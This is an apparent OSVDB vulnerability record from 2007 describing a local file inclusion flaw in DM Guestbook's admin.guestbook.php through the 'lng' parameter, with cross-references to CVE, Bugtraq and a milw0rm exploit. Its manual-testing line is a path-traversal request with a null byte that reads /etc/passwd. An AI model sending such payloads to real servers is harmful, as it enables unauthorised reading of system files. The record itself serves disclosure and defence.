DM Guestbook admin/admin.guestbook.php lng Traversal Variable Local File Inclusion

2007-11-02T00:00:00
ID OSVDB:39065
Type osvdb
Reporter OSVDB
Modified 2007-11-02T00:00:00

Description

Manual Testing Notes

/admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00

References:

Related OSVDB ID: 39066 Related OSVDB ID: 39067 Related OSVDB ID: 39064 ISS X-Force ID: 38219 Generic Exploit URL: http://www.milw0rm.com/exploits/4597 FrSIRT Advisory: ADV-2007-3747 CVE-2007-5821 Bugtraq ID: 26300